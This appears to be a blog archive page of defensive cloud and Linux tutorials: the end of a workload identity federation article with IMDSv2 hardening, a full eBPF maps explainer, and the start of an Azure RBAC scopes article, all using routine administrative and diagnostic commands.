PRINCIPAL_ID=$(az identity show --name app-backend-identity -g rg-identities --query principalId -o tsv)

# Grant the identity the access it needs
az role assignment create \
  --assignee-object-id "$PRINCIPAL_ID" \
  --role "Storage Blob Data Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/appstore

# Federate: trust the K8s service account from this cluster
az identity federated-credential create \
  --name aks-app-backend-binding \
  --identity-name app-backend-identity \
  --resource-group rg-identities \
  --issuer "${OIDC_ISSUER}" \
  --subject "system:serviceaccount:production:app-backend" \
  --audience "api://AzureADTokenExchange"

apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    azure.workload.identity/client-id: "CLIENT_ID_HERE"
---
apiVersion: v1
kind: Pod
metadata:
  labels:
    azure.workload.identity/use: "true"   # triggers token injection
spec:
  serviceAccountName: app-backend
  containers:
  - name: app
    image: my-app:latest
    # Azure SDK DefaultAzureCredential picks up the injected token automatically

Cross-Cloud Federation — When AWS Talks to GCP

The same OIDC mechanism works cross-cloud. An AWS Lambda or EC2 instance can call GCP APIs without any GCP service account key on the AWS side:

# GCP side: create a workload identity pool that trusts AWS
gcloud iam workload-identity-pools create "aws-workloads" --location=global

gcloud iam workload-identity-pools providers create-aws "aws-provider" \
  --workload-identity-pool="aws-workloads" \
  --account-id="AWS_ACCOUNT_ID"

# Bind the specific AWS role to the GCP service account
gcloud iam service-accounts add-iam-policy-binding [email protected] \
  --role=roles/iam.workloadIdentityUser \
  --member="principalSet://iam.googleapis.com/projects/GCP_PROJ_NUM/locations/global/workloadIdentityPools/aws-workloads/attribute.aws_role/arn:aws:sts::AWS_ACCOUNT:assumed-role/MyAWSRole"

The AWS workload presents its STS-issued credentials to GCP’s token exchange endpoint. GCP verifies the AWS signature, checks the attribute mapping (only MyAWSRole from that AWS account), and issues a short-lived GCP access token. No GCP service account key is ever distributed to the AWS side.

The Threat Model — What Workload Identity Doesn’t Solve

Workload identity dramatically reduces the attack surface, but it doesn’t eliminate it:

Threat	What Still Applies	Mitigation
Token theft from the container filesystem	The projected token is readable if you have container filesystem access	Short TTL (default 1h); tokens are audience-bound — can’t use a K8s token to call Azure APIs
SSRF to metadata service	An SSRF vulnerability can fetch credentials from the metadata endpoint	Enforce IMDSv2 on AWS; use metadata server restrictions on GKE/AKS
Overpermissioned service account	Workload identity doesn’t enforce least privilege — the SA can still be over-granted	One SA per workload; review permissions against actual usage
Trust policy too broad	OIDC trust policy allows any service account in a namespace	Always pin to specific SA name in the `sub` condition

The SSRF-to-metadata-service path deserves particular attention. IMDSv2 (mandatory in AWS by requiring a PUT to get a token before any metadata request) blocks most SSRF scenarios because a simple SSRF can only make GET requests. Enforce it:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP — no instance can launch without IMDSv2
{
  "Effect": "Deny",
  "Action": "ec2:RunInstances",
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringNotEquals": {
      "ec2:MetadataHttpTokens": "required"
    }
  }
}

⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — Trust policy scoped to namespace, not service account ║
║                                                                      ║
║  A condition like "sub": "system:serviceaccount:production:*"        ║
║  grants any pod in the production namespace the ability to assume    ║
║  the role. A compromised or new workload in that namespace gets      ║
║  access automatically.                                               ║
║                                                                      ║
║  Fix: always pin the sub condition to the exact service account      ║
║  name. "system:serviceaccount:production:app-backend" — not a glob.  ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Shared service accounts across workloads             ║
║                                                                      ║
║  Reusing one service account for multiple workloads saves setup      ║
║  time and creates a lateral movement path. A compromised workload    ║
║  that shares a service account with a payment processor has payment  ║
║  processor permissions.                                              ║
║                                                                      ║
║  Fix: one service account per workload. The overhead is low.         ║
║  The blast radius reduction is significant.                          ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — IMDSv1 still reachable after enabling IMDSv2        ║
║                                                                      ║
║  Enabling IMDSv2 on new instances doesn't affect existing ones.      ║
║  The SCP approach enforces it at the org level going forward, but    ║
║  existing instances need explicit remediation.                       ║
║                                                                      ║
║  Fix: audit existing instances for IMDSv1 exposure.                 ║
║  aws ec2 describe-instances --query                                  ║
║    "Reservations[].Instances[?MetadataOptions.HttpTokens!='required']║
║    .[InstanceId,Tags]"                                               ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌────────────────────────────────┬───────────────────────────────────────────────────────┐
│ Term                           │ What it means                                         │
├────────────────────────────────┼───────────────────────────────────────────────────────┤
│ Workload identity federation   │ OIDC-based exchange: runtime JWT → short-lived token  │
│ IRSA                           │ IAM Roles for Service Accounts — EKS + OIDC pattern   │
│ EKS Pod Identity               │ Newer, simpler IRSA replacement — no OIDC setup       │
│ GKE Workload Identity          │ K8s SA → GCP SA via workload pool + IAM binding       │
│ AKS Workload Identity          │ K8s SA → managed identity via federated credential    │
│ IAM Roles Anywhere             │ AWS temp credentials for on-prem via X.509 cert       │
│ IMDSv2                         │ Token-gated AWS metadata service — blocks SSRF        │
│ OIDC sub claim                 │ Workload's unique identity string — use for pinning   │
│ Projected service account token│ K8s-injected JWT — the OIDC token pods present to AWS │
└────────────────────────────────┴───────────────────────────────────────────────────────┘

Key commands:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — list OIDC providers registered in this account                               │
│  aws iam list-open-id-connect-providers                                               │
│                                                                                        │
│  # AWS — list Pod Identity associations for a cluster                                 │
│  aws eks list-pod-identity-associations --cluster-name my-cluster                     │
│                                                                                        │
│  # AWS — verify what credentials a pod is actually using                              │
│  aws sts get-caller-identity   # run from inside the pod                              │
│                                                                                        │
│  # AWS — audit instances missing IMDSv2                                               │
│  aws ec2 describe-instances \                                                          │
│    --query "Reservations[].Instances[?MetadataOptions.HttpTokens!='required']          │
│    .[InstanceId]" --output text                                                        │
│                                                                                        │
│  # GCP — verify workload identity binding on a GCP service account                   │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL                                  │
│                                                                                        │
│  # GCP — list workload identity pools                                                 │
│  gcloud iam workload-identity-pools list --location=global                            │
│                                                                                        │
│  # Azure — list federated credentials on a managed identity                           │
│  az identity federated-credential list \                                               │
│    --identity-name app-backend-identity --resource-group rg-identities                │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

Framework	Reference	What It Covers Here
CISSP	Domain 5 — Identity and Access Management	Non-human identities dominate cloud environments; workload identity federation is the modern machine authentication pattern
CISSP	Domain 1 — Security & Risk Management	Static credential sprawl is a measurable, eliminable risk; workload identity removes it at the root
ISO 27001:2022	5.17 Authentication information	Managing machine credentials — workload identity replaces long-lived secrets with short-lived, environment-bound tokens
ISO 27001:2022	8.5 Secure authentication	OIDC token exchange is the secure authentication mechanism for machine identities
ISO 27001:2022	5.18 Access rights	Service account provisioning and deprovisioning — workload identity ties access to the runtime environment, not a stored secret
SOC 2	CC6.1	Workload identity federation is the preferred technical control for machine-to-cloud authentication in CC6.1
SOC 2	CC6.7	Short-lived, audience-bound tokens restrict credential reuse across systems — addresses transmission and access controls

Key Takeaways

Static credentials for machine identities are the problem, not the solution — workload identity federation eliminates them at the root
The OIDC token exchange pattern is consistent across AWS (IRSA/Pod Identity), GCP (Workload Identity), and Azure (AKS Workload Identity) — learn one, the others are a translation
AWS EKS: use Pod Identity for new clusters; IRSA remains the pattern for existing ones — both eliminate static keys
GCP GKE: Workload Identity enabled at cluster level, SA annotation at the K8s service account level
Azure AKS: federated credential on the managed identity, azure.workload.identity/use: "true" label on pods
Cross-cloud federation works — an AWS IAM role can call GCP APIs without a GCP key file
Enforce IMDSv2 everywhere; pin OIDC trust conditions to specific service account names; apply least privilege to the underlying cloud identity

What’s Next

You’ve eliminated the static credential problem. The next question is: what happens when the IAM configuration itself is the vulnerability? AWS IAM privilege escalation goes into the attack paths — how iam:PassRole, iam:CreateAccessKey, and misconfigured trust policies turn IAM misconfigurations into full account compromise. If you’re designing or auditing cloud access control, you need to know these paths before an attacker finds them.

Next: AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise

Get EP08 in your inbox when it publishes → linuxcent.com/subscribe

eBPF Maps — The Persistent Data Layer Between Kernel and Userspace

May 13, 2026April 16, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes

eBPF: From Kernel to Cloud, Episode 5
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps**

Architecture Overview

eBPF Maps — the persistent data layer between kernel eBPF programs and userspace tools — eBPF maps are the shared memory between kernel programs and userspace — hash, array, ringbuf, and LRU variants shown.

TL;DR

eBPF programs are stateless — maps are where all state lives, between invocations and between kernel and userspace
(“stateless” here means each program invocation starts with no memory of previous runs — like a function with no global variables)
Every production eBPF tool (Cilium, Falco, Tetragon, Datadog NPM) is a map-based architecture — bpftool map list shows you what it’s actually holding
Per-CPU maps eliminate write contention for high-frequency counters; the tool aggregates per-CPU values at export time
LRU maps handle unbounded key spaces (IPs, PIDs, connections) without hard errors when full — but eviction is silent, so size generously
Ring buffer (kernel 5.8+) is the correct event streaming primitive — Falco and Tetragon both use it
Map memory is kernel-locked and invisible to standard memory metrics — account for it explicitly on eBPF-heavy nodes
Pinned maps survive restarts; Cilium uses this for zero-disruption connection tracking through upgrades

The Big Picture

  HOW eBPF MAPS CONNECT KERNEL PROGRAMS TO USERSPACE TOOLS

  ┌─────────────────────────────────────────────────────────────┐
  │  Kernel space                                               │
  │                                                             │
  │  [XDP program]  [TC program]  [kprobe]  [tracepoint]        │
  │        │              │           │           │             │
  │        └──────────────┴───────────┴───────────┘             │
  │                              │                              │
  │                   bpf_map_update_elem()                     │
  │                              │                              │
  │                              ▼                              │
  │  ┌─────────────────────────────────────────────────────┐    │
  │  │             eBPF MAP (kernel object)                │    │
  │  │  hash · percpu_hash · lru_hash · ringbuf · lpm_trie │    │
  │  │  Lives outside program invocations.                 │    │
  │  │  Pinned maps (/sys/fs/bpf/) survive restarts.       │    │
  │  └────────────────────┬────────────────────────────────┘    │
  └───────────────────────│─────────────────────────────────────┘
                          │  read / write via file descriptor
                          ▼
  ┌─────────────────────────────────────────────────────────────┐
  │  Userspace tools                                            │
  │                                                             │
  │  Cilium agent  Falco engine  Tetragon  bpftool map dump     │
  └─────────────────────────────────────────────────────────────┘

eBPF maps are the persistent data layer between kernel programs and the tools that consume their output. eBPF programs fire and exit — there’s no memory between invocations. Yet Cilium tracks TCP connections across millions of packets, and Falco correlates a process exec from five minutes ago with a suspicious network connection happening now. The mechanism between stateless kernel programs and the stateful production tools you depend on is what this episode is about — and understanding it changes what you see when you run bpftool map list.

I was trying to identify the noisy neighbor saturating a cluster’s egress link. I had an eBPF program loading cleanly, events firing, everything confirming it was working. But when I read back the per-port connection counters from userspace, everything was zero.

I spent an hour on it before posting to the BCC mailing list. The reply came back fast: eBPF programs don’t hold state between invocations. Every time the kprobe fires, the program starts fresh. The counter I was incrementing existed only for that single call — created, incremented to one, then discarded. On every single invocation. I was counting events one at a time, throwing the count away, and reading nothing.

That’s what eBPF maps solve.

Quick Check: What Maps Are Running on Your Node?

Before the map types walkthrough — see the live state of maps on any cluster node right now:

# SSH into a worker node, then:
bpftool map list

On a node running Cilium + Falco, you’ll see something like:

12: hash          name cilium_ct4_glo    key 24B  value 56B  max_entries 65536  memlock 5767168B
13: lpm_trie      name cilium_ipcache    key 40B  value 32B  max_entries 512000 memlock 327680B
14: percpu_hash   name cilium_metrics    key 8B   value 32B  max_entries 65536  memlock 2097152B
28: ringbuf       name falco_events      max_entries 8388608

Reading this output:
– hash, lpm_trie, percpu_hash, ringbuf — the map type (each optimised for a different access pattern)
– key 24B value 56B — sizes of a single entry’s key and value in bytes
– max_entries — the hard ceiling; when the map is full, behaviour depends on type (see LRU section below)
– memlock — non-pageable kernel memory this map consumes (invisible to free and container metrics)

Not running Cilium? On EKS with aws-vpc-cni or GKE with kubenet, there are far fewer maps here — primarily kube-proxy uses iptables rather than BPF maps. Running bpftool map list still works; you’ll just see fewer entries. On a pure iptables-based cluster, most of the maps you see come from the system kernel itself, not a CNI.

Maps Are the Architecture, Not an Afterthought

Maps are kernel objects that live outside any individual program invocation. They’re shared between multiple eBPF programs, readable and writable from userspace, and persistent for the lifetime of the map — which can outlive both the program that created them and the userspace process that loaded them.

Every production eBPF tool is fundamentally a map-based architecture:

Cilium stores connection tracking state in BPF hash maps
Falco uses ring buffers to stream syscall events to its userspace rule engine
Tetragon maintains process tree state across exec events using maps
Datadog NPM stores per-connection flow stats in per-CPU maps for lock-free metric accumulation

Run bpftool map list on a Cilium node:

$ bpftool map list
ID 12: hash          name cilium_ct4_glo    key 24B  value 56B   max_entries 65536
#      ^^^^           ^^^^^^^^^^^^^^^^       ^^^^^^   ^^^^^^^     ^^^^^^^^^^^^^^^^
#      type           map name               key size value size  max concurrent entries

ID 13: lpm_trie      name cilium_ipcache    key 40B  value 32B   max_entries 512000
#      longest-prefix-match trie — for IP address + CIDR lookups

ID 14: percpu_hash   name cilium_metrics    key 8B   value 32B   max_entries 65536
#      one copy of this map per CPU — no write contention for high-frequency counters

ID 28: ringbuf       name falco_events      max_entries 8388608
#                                           ^^^^^^^^^^^ 8MB ring buffer for event streaming

Connection tracking, IP policy cache, per-CPU metrics, event stream. Every one of these is a different map type, chosen for a specific reason.

Map Types and What They’re Actually Used For

Hash Maps

The general-purpose key-value store. A key maps to a value — lookup is O(1) average. Cilium’s connection tracking map (cilium_ct4_glo) is a hash map: the key is a 5-tuple (source IP, destination IP, ports, protocol), the value is the connection state.

$ bpftool map show id 12
12: hash  name cilium_ct4_glo  flags 0x0
        key 24B  value 56B  max_entries 65536  memlock 5767168B

The key 24B is the 5-tuple. The value 56B is the connection state record. max_entries 65536 is the upper bound — Cilium can track 65,536 active connections in this map before hitting the limit.

Hash maps are shared across all CPUs on the node. When multiple CPUs try to update the same entry simultaneously — which happens constantly on busy nodes — writes need to be coordinated. For most use cases this is fine. For high-frequency counters updated on every packet, it’s a bottleneck. That’s when you reach for a per-CPU hash map.

Where you see them: connection tracking, per-IP statistics, process-to-identity mapping, policy verdict caching.

Per-CPU Hash Maps

Per-CPU hash maps solve the write coordination problem by giving each CPU its own independent copy of every entry. There’s no sharing, no contention, no waiting — each CPU writes its own copy without touching any other.

The tradeoff: reading from userspace means collecting one value per CPU and summing them up. That aggregation happens in the tool, not the kernel.

# Cilium's per-CPU metrics map — one counter value per CPU
bpftool map dump id 14
key: 0x00000001
  value (CPU 00): 12345
  value (CPU 01): 8901
  value (CPU 02): 3421
  value (CPU 03): 7102
# total bytes for this metric: 31769

Cilium’s cilium_metrics map uses this pattern for exactly this reason — it’s updated on every packet across every CPU on the node. Forcing all CPUs to coordinate writes to a single shared entry at that rate would hurt throughput. Instead: each CPU writes locally, Cilium’s userspace agent sums the values at export time.

Where you see them: packet counters, byte counters, syscall frequency metrics — anywhere updates happen on every event at high volume.

LRU Hash Maps

LRU hash maps add automatic eviction. Same key-value semantics as a regular hash map, but when the map hits its entry limit, the least recently accessed entry is dropped to make room for the new one.

This matters for any map tracking dynamic state with an unpredictable number of keys: TCP connections, process IDs, DNS queries, pod IPs. Without LRU semantics, a full map returns an error on insert — and in production, that means your tool silently stops tracking new entries. Not a crash, not an alert — just missing data.

Cilium’s connection tracking map is LRU-bounded at 65,536 entries. On a node handling high-connection-rate workloads, this can fill up. When it does, Cilium starts evicting old connections to make room for new ones — and if it’s evicting too aggressively, you’ll see connection resets.

# Check current CT map usage vs its limit
bpftool map show id 12
# max_entries tells you the ceiling
# count entries to see current usage
bpftool map dump id 12 | grep -c "^key"

Size LRU maps at 2× your expected concurrent active entries. Aggressive eviction under pressure introduces gaps — not crashes, but missing or incorrect state.

Where you see them: connection tracking, process lineage, anything where the key space is dynamic and unbounded.

Ring Buffers

Ring buffers are how eBPF tools stream events from the kernel to a userspace consumer. Falco reads syscall events from a ring buffer. Tetragon streams process execution and network events through ring buffers. The pattern is the same across all of them:

kernel eBPF program
  → sees event (syscall, network packet, process exec)
  → writes record to ring buffer
  → userspace tool reads it and processes (Falco rules, Tetragon policies)

What makes ring buffers the right primitive for event streaming:

Single buffer shared across all CPUs — unlike the older perf_event_array approach which required one buffer per CPU, a ring buffer is one allocation, one file descriptor, one consumer
Lock-free — the kernel writes, the userspace tool reads, they don’t block each other
Backpressure when full — if the userspace tool can’t keep up, new events are dropped rather than queued indefinitely. The tool can detect and count drops. Falco reports these as Dropped events in its stats output.

# Falco's ring buffer — 8MB
bpftool map list | grep ringbuf
# ID 28: ringbuf  name falco_events  max_entries 8388608

8,388,608 bytes = 8MB. That’s the buffer between Falco’s kernel hooks and its rule engine. If there’s a burst of syscall activity and Falco’s rule evaluation can’t keep up, events drop into that window and are lost.

Sizing matters operationally. Too small and you drop events during normal burst. Too large and you’re holding non-pageable kernel memory that doesn’t show up in standard memory metrics.

# Check Falco's drop rate
falcoctl stats
# or check the Falco logs
journalctl -u falco | grep -i "drop"

Most production deployments run 8–32MB. Start at 8MB, monitor drop rates under load, size up if needed.

Where you see them: Falco event streaming, Tetragon audit events, any tool that needs to move high-volume event data from kernel to userspace.

Array Maps

Array maps are fixed-size, integer-indexed, and entirely pre-allocated at creation time. Think of them as lookup tables with integer keys — constant-time access, no hash overhead, no dynamic allocation.

Cilium uses array maps for policy configuration: a fixed set of slots indexed by endpoint identity number. When a packet arrives and Cilium needs to check policy, it indexes into the array directly rather than doing a hash lookup. For read-heavy, write-rare data, this is faster.

The constraint: you can’t delete entries from an array map. Every slot exists for the lifetime of the map. If you need to track state that comes and goes — connections, processes, pods — use a hash map instead.

Where you see them: policy configuration, routing tables with fixed indices, per-CPU stats indexed by CPU number.

LPM Trie Maps

LPM (Longest Prefix Match) trie maps handle IP prefix lookups — the same operation that a hardware router does when deciding which interface to send a packet out of.

You can store a mix of specific host addresses (/32) and CIDR ranges (/16, /24) in the same map, and a lookup returns the most specific match. If 10.0.1.15/32 and 10.0.0.0/8 are both in the map, a lookup for 10.0.1.15 returns the /32 entry.

Cilium’s cilium_ipcache map is an LPM trie. It maps every IP in the cluster to its security identity — the identifier Cilium uses for policy enforcement. When a packet arrives, Cilium does a trie lookup on the source IP to find out which endpoint sent it, then checks policy against that identity.

# Inspect the ipcache map
bpftool map show id 13
# lpm_trie  name cilium_ipcache  key 40B  value 32B  max_entries 512000

# Look up which security identity owns a pod IP
bpftool map lookup id 13 key hex 20 00 00 00 0a 00 01 0f 00 00 00 00 00 00 00 00 00 00 00 00

Where you see them: IP-to-identity mapping (Cilium), CIDR-based policy enforcement, IP blocklists.

Pinned Maps — State That Survives Restarts

By default, a map’s lifetime is tied to the tool that created it. When the tool exits, the kernel garbage-collects the map.

Pinning writes a reference to the BPF filesystem at /sys/fs/bpf, which keeps the map alive even after the creating process exits:

# See all maps Cilium has pinned
ls /sys/fs/bpf/tc/globals/
# cilium_ct4_global  cilium_ipcache  cilium_metrics  cilium_policy ...

# Inspect a pinned map directly — no Cilium process needed
bpftool map dump pinned /sys/fs/bpf/tc/globals/cilium_ct4_global

# Pin any map by ID for manual inspection
bpftool map pin id 12 /sys/fs/bpf/my_conn_tracker
bpftool map dump pinned /sys/fs/bpf/my_conn_tracker

Cilium pins all its maps under /sys/fs/bpf/tc/globals/. When Cilium restarts — rolling upgrade, crash, OOM kill — it reopens its pinned maps and resumes with existing state intact. Pods maintain established TCP connections through a Cilium restart without disruption.

This is operationally significant: if you’re evaluating eBPF-based tools for production, check whether they pin their maps. A tool that doesn’t loses all its tracked state on every restart — connection tracking resets, process lineage gaps, policy state rebuilt from scratch.

Map Memory: A Production Consideration

Map memory is kernel-locked — it cannot be paged out, and it doesn’t show up in standard memory pressure metrics. Your node’s free output and container memory limits don’t account for it.

Kernel-locked memory is memory the OS guarantees will never be swapped to disk — it stays in RAM permanently. The kernel requires this for eBPF maps because a kernel program running during a network interrupt cannot wait for a page fault. The side effect: it doesn’t appear in top, free, or container memory metrics, so it’s easy to accidentally provision nodes without accounting for it.

# Total eBPF map memory locked on this node
bpftool map list -j | python3 -c "
import json,sys
maps=json.load(sys.stdin)
total=sum(m.get('bytes_memlock',0) for m in maps)
print(f'Total map memory: {total/1024/1024:.1f} MB')
"

# Check system memlock limit (unlimited is correct for eBPF tools)
ulimit -l

# Check what Cilium's systemd unit sets
systemctl show cilium | grep -i memlock

On a node running Cilium + Falco + Datadog NPM, I’ve seen 200–400MB of map memory locked. That’s real, non-pageable kernel memory. If you’re sizing nodes for eBPF-heavy workloads, account for this separately from your pod workload memory.

If an eBPF tool fails to load with a permission error despite having enough free memory, the root cause is usually the memlock ulimit for the process. Cilium, Falco, and most production tools set LimitMEMLOCK=infinity in their systemd units. Verify this if you’re deploying a new eBPF-based tool and seeing unexpected load failures.

Inspecting Maps in Production

# List all maps: type, name, key/value sizes, memory usage
bpftool map list

# Dump all entries in a map (careful with large maps)
bpftool map dump id 12

# Look up a specific entry by key
bpftool map lookup id 12 key hex 0a 00 01 0f 00 00 00 00

# Watch map stats live
watch -n1 'bpftool map show id 12'

# See all maps for a specific tool by checking its pinned path
ls /sys/fs/bpf/tc/globals/                    # Cilium
ls /sys/fs/bpf/falco/                         # Falco (if pinned)

# Cross-reference map IDs with the programs using them
bpftool prog list
bpftool map list

⚠ Production Gotchas

A full LRU map drops state silently, not loudly
When Cilium’s CT map fills up, it starts evicting the least recently used connections — not returning an error. You see connection resets, not a tool alert. Check map utilisation (bpftool map dump id X | grep -c key) against max_entries on nodes with high connection rates.

Ring buffer drops don’t stop the tool — they create gaps
When Falco’s ring buffer fills up, events are dropped. Falco keeps running. The rule engine keeps processing. But you have gaps in your syscall visibility. Monitor Dropped events in Falco’s stats and size the ring buffer accordingly.

Map memory is invisible to standard monitoring
200–400MB of kernel-locked memory on a Cilium + Falco node doesn’t appear in top, container memory metrics, or memory pressure alerts. Size eBPF-heavy nodes with this in mind and add explicit map memory monitoring via bpftool.

Tools that don’t pin their maps lose state on restart
A Cilium restart with pinned maps = zero-disruption connection tracking. A tool without pinning = all tracked state rebuilt from scratch. This matters for connection tracking tools and any tool maintaining process lineage.

perf_event_array on kernel 5.8+ is the old way
Older eBPF tools use per-CPU perf_event_array for event streaming. Ring buffer is strictly better — single allocation, lower overhead, simpler consumption. If you’re running a tool that still uses perf_event_array on a 5.8+ kernel, it’s using a legacy path.

Key Takeaways

eBPF programs are stateless — maps are where all state lives, between invocations and between kernel and userspace
Every production eBPF tool (Cilium, Falco, Tetragon, Datadog NPM) is a map-based architecture — bpftool map list shows you what it’s actually holding
Per-CPU maps eliminate write contention for high-frequency counters; the tool aggregates per-CPU values at export time
LRU maps handle unbounded key spaces (IPs, PIDs, connections) without hard errors when full — but eviction is silent, so size generously
Ring buffer (kernel 5.8+) is the correct event streaming primitive — Falco and Tetragon both use it
Map memory is kernel-locked and invisible to standard memory metrics — account for it explicitly on eBPF-heavy nodes
Pinned maps survive restarts; Cilium uses this for zero-disruption connection tracking through upgrades

What’s Next

You know what program types run in the kernel, and you know how they hold state.

Get EP06 in your inbox when it publishes → linuxcent.com/subscribe But there’s a problem anyone running eBPF-based tools eventually runs into: a tool works on one kernel version and breaks on the next. Struct layouts shift between patch versions. Field offsets move. EP06 covers CO-RE (Compile Once, Run Everywhere) and libbpf — the mechanism that makes tools like Cilium and Falco survive your node upgrades without recompilation, and why kernel version compatibility is a solved problem for any tool built on this toolchain.

Azure RBAC Explained: Management Groups, Subscriptions, and Scope

May 10, 2026April 16, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes

What Is Cloud IAM → Authentication vs Authorization → IAM Roles vs Policies → AWS IAM Deep Dive → GCP Resource Hierarchy IAM → Azure RBAC Scopes

TL;DR

Entra ID and Azure RBAC are two separate authorization planes — Entra ID roles control the identity system; RBAC roles control Azure resources. Global Administrator doesn’t grant VM access.
Azure RBAC role assignments inherit downward through the hierarchy: Management Group → Subscription → Resource Group → Resource
Use managed identities for all Azure-hosted workloads — system-assigned for one-to-one resource binding, user-assigned for shared access across multiple resources
Contributor is the right role for most service identities — full resource management without the ability to modify RBAC assignments
The Actions vs DataActions split means you can audit management access and data access independently — an incomplete audit checks only one
PIM (Privileged Identity Management) should govern all Entra ID privileged roles — nobody should permanently hold Global Admin or Subscription Owner

The Big Picture

         Azure: Two Separate Authorization Planes
─────────────────────────────────────────────────────────
  Entra ID (Identity Plane)      Azure RBAC (Resource Plane)
  ─────────────────────────      ───────────────────────────
  Controls:                      Controls:
  · Users, groups, apps          · Azure resources
  · Tenant settings              · Management groups
  · App registrations            · Subscriptions
  · Conditional access           · Resource groups
                                 · Individual resources

  Roles (examples):              Scope hierarchy:
  · Global Administrator         Management Group
  · User Administrator             └─ Subscription
  · Security Reader                     └─ Resource Group
  · Application Administrator                └─ Resource

  Scope: tenant-wide             Role assignment at any level
                                 inherits down to all nodes below

  Both planes use Entra ID identities.
  Authorization in each plane is completely independent.
  Global Admin ≠ Subscription Owner.

Azure RBAC scopes determine how far a role assignment reaches — and the blast radius of a misconfiguration scales directly with how high in the hierarchy it sits.

Introduction

Azure RBAC scopes define where a role assignment applies and everything it inherits. A role at the Management Group level touches every subscription, every resource group, and every resource across your entire Azure estate. A role at the resource level touches only that resource. Understanding scope before making any assignment is the difference between “access for this storage account” and “access for your entire org.”

When I first worked seriously in Azure environments, I had a mental model carried over from Active Directory administration. Users, groups, directory roles — I knew how that worked. I assumed Azure’s IAM would be an extension of the same system, just with cloud resources bolted on.

That assumption got me into trouble within the first week.

I was trying to understand why an engineer had Global Administrator access in Entra ID but couldn’t see the resources in a Subscription. In Active Directory terms, if you’re a Domain Admin, you can see everything. In Azure, it doesn’t work that way.

Entra ID roles and Azure RBAC roles are two different systems. Global Administrator is an Entra ID role — it controls who can manage the identity plane: create users, manage app registrations, configure tenant settings. It has nothing to do with Azure resources like virtual machines, storage accounts, or Kubernetes clusters. Those are governed by Azure RBAC, which is an entirely separate authorization system.

I spent two hours trying to understand why a Global Admin couldn’t list VMs before someone explained this. I’m putting it at the top of this episode so you don’t lose those two hours.

Entra ID vs Azure RBAC — The Two Separate Planes

	Entra ID	Azure RBAC
Controls access to	Entra ID itself — users, groups, apps, tenant settings	Azure resources — VMs, storage, databases, subscriptions
Role types	Entra ID directory roles	Azure resource roles
Example roles	Global Admin, User Admin, Security Reader	Owner, Contributor, Storage Blob Data Reader
Scope	Tenant-wide	Management group → Subscription → Resource Group → Resource
Managed via	Entra ID admin center	Azure portal / ARM / Azure CLI

A user can be Global Administrator — the highest Entra ID role — and have zero access to Azure resources unless explicitly assigned an Azure RBAC role. And vice versa: a user with Subscription Owner (highest Azure RBAC role) has no ability to manage Entra ID user accounts without an Entra ID role assignment.

These are not the same system. They’re connected — both use Entra ID identities as principals — but authorization in each plane is independent.

The Azure Resource Hierarchy

Azure RBAC role assignments can be made at any level of the resource hierarchy, and they inherit downward:

Tenant (Entra ID)
  └── Management Group  (policy and RBAC inheritance across subscriptions)
        └── Management Group  (nested, up to 6 levels)
              └── Subscription  (billing and resource boundary)
                    └── Resource Group  (logical container for resources)
                          └── Resource  (VM, storage account, key vault, AKS cluster...)

A role assigned at the Subscription level applies to every resource group and resource in that subscription. A role at the Management Group level applies to every subscription beneath it.

The blast radius of a misconfiguration scales with how high in the hierarchy it sits. Subscription Owner at the subscription level is contained to that subscription. Management Group Contributor at the root management group touches your entire Azure estate.

# View management group hierarchy
az account management-group list --output table

# List subscriptions
az account list --output table

# View all role assignments at a scope — start here in any audit
az role assignment list \
  --scope /subscriptions/SUB_ID \
  --include-inherited \
  --output table

Principal Types in Azure RBAC

Type	What It Is	Best For
User	Entra ID user account	Human access
Group	Entra ID security group	Team-based access
Service Principal	App registration with credentials (secret or cert)	External systems, apps with their own identity
Managed Identity	Credential-less identity for Azure-hosted workloads	Everything running in Azure

Managed Identities — The Right Model for Workloads

Managed identities are Azure’s answer to AWS instance profiles and GCP service accounts attached to compute. Azure manages the entire credential lifecycle — tokens are issued automatically, there’s nothing to create, rotate, or revoke manually.

System-assigned managed identity is tied to a specific Azure resource. When the resource is deleted, the identity is deleted. One-to-one, no sharing.

# Enable system-assigned managed identity on a VM
az vm identity assign \
  --name my-vm \
  --resource-group rg-prod

# Get the principal ID (needed to assign RBAC roles to it)
az vm show \
  --name my-vm \
  --resource-group rg-prod \
  --query identity.principalId \
  --output tsv

User-assigned managed identity is a standalone resource that can be attached to multiple Azure resources and persists independently. This is the right model when multiple services need the same access — instead of assigning the same RBAC roles to ten separate system-assigned identities, you create one user-assigned identity, grant it the roles, and attach it to all ten resources.

# Create a user-assigned managed identity
az identity create \
  --name app-backend-identity \
  --resource-group rg-identities

# Get its identifiers
az identity show \
  --name app-backend-identity \
  --resource-group rg-identities \
  --query '{principalId:principalId, clientId:clientId}'

# Attach to a VM
az vm identity assign \
  --name my-vm \
  --resource-group rg-prod \
  --identities /subscriptions/SUB/resourceGroups/rg-identities/providers/Microsoft.ManagedIdentity/userAssignedIdentities/app-backend-identity

Code running inside an Azure VM or App Service with a managed identity gets tokens via IMDS, with no credential management required:

from azure.identity import DefaultAzureCredential
from azure.storage.blob import BlobServiceClient

# DefaultAzureCredential automatically picks up the managed identity in Azure
credential = DefaultAzureCredential()
client = BlobServiceClient(
    account_url="https://myaccount.blob.core.windows.net",
    credential=credential
)

The DefaultAzureCredential chain: managed identity → environment variables → workload identity → Visual Studio / VS Code authentication → Azure CLI. In Azure-hosted services, the managed identity path is used automatically. In local development, it falls through to the developer’s az login session.

